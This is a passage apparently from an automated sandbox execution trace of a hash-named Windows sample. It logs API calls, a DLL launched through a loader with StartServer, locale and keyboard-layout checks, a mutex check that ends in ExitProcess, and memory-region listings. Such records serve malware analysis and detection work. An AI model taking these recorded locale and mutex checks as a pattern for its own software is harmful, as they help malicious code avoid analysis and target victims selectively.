lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0125.091] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.092] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0125.093] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0125.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0125.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0125.094] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0125.094] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0125.095] GetProcessHeap () returned 0x480000 [0125.095] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x480000) returned 1 [0125.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0125.367] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0125.368] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1000) returned 0x2cb5030 [0125.370] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x18) returned 0x499200 [0125.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="StartServer", cchWideChar=-1, lpMultiByteStr=0x499200, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartServer", lpUsedDefaultChar=0x0) returned 12 [0125.371] GetLastError () returned 0x0 [0125.371] SetLastError (dwErrCode=0x0) [0125.371] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StartServerW") returned 0x0 [0125.371] GetLastError () returned 0x7f [0125.371] SetLastError (dwErrCode=0x7f) [0125.371] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StartServerA") returned 0x0 [0125.371] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StartServer") returned 0x7ffc45e913a0 [0125.371] GetActiveWindow () returned 0x0 [0125.375] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0125.375] GetSystemDefaultLangID () returned 0x409 [0125.377] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0125.377] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0125.377] GetProcessHeap () returned 0x480000 [0125.377] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8) returned 0x483cb0 [0125.377] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0125.377] GetKeyboardLayoutList (in: nBuff=1, lpList=0x483cb0 | out: lpList=0x483cb0) returned 1 [0125.377] GetProcessHeap () returned 0x480000 [0125.377] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x483cb0 | out: hHeap=0x480000) returned 1 [0125.377] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0125.378] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0125.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0125.378] GetLastError () returned 0x0 [0125.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0125.378] CloseHandle (hObject=0x17c) returned 1 [0125.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0125.378] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0125.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0125.379] GetLastError () returned 0xb7 [0125.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0125.379] CloseHandle (hObject=0x17c) returned 1 [0125.379] ExitProcess (uExitCode=0x1) [0125.379] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48c300 | out: hHeap=0x480000) returned 1 [0125.380] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495af0 | out: hHeap=0x480000) returned 1 [0125.382] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0125.382] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0125.382] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0125.382] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0125.382] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0125.382] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0125.383] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4970d0 | out: hHeap=0x480000) returned 1 [0125.383] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0125.383] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0125.384] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 26 os_tid = 0xff4 Process: id = "8" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x1f3b5000" os_pid = "0x1274" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 716 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 717 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 718 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 719 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 720 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 721 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 722 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 723 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 724 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 725 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 726 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 728 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 729 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 730 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 731 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 732 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 733 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 734 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 735 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 736 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 737 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 738 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 739 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 740 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 741 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 742 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 743 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 744 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 745 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 746 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 747 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 748 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 749 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 750 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 751 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 752 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 753 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 754 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 756 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 757 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 758 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 769 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 770 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 771 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 772 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 773 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 774 start_va = 0x4c0000 end_va = 0x57ffff monitored = 0 entry_point = 0x4e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 826 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 876 start_va = 0x1eb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 877 start_va = 0x1fb0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 923 start_va = 0x21b0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 924 start_va = 0x25b0000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1016 start_va = 0x2db0000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 1314 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1319 start_va = 0x3d80000 end_va = 0x40b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1369 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1370 start_va = 0x40c0000 end_va = 0x434afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1386 start_va = 0x40c0000 end_va = 0x4212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1391 start_va = 0x40c0000 end_va = 0x4282fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1444 start_va = 0x40c0000 end_va = 0x564bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 2062 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2065 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2066 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2067 start_va = 0x40c0000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 2070 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2071 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2072 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2076 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2078 start_va = 0x40c0000 end_va = 0x421dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 2080 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 27 os_tid = 0xcb8 [0097.916] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.103] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0098.103] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.104] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0098.104] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0098.104] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.104] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0098.105] GetProcessHeap () 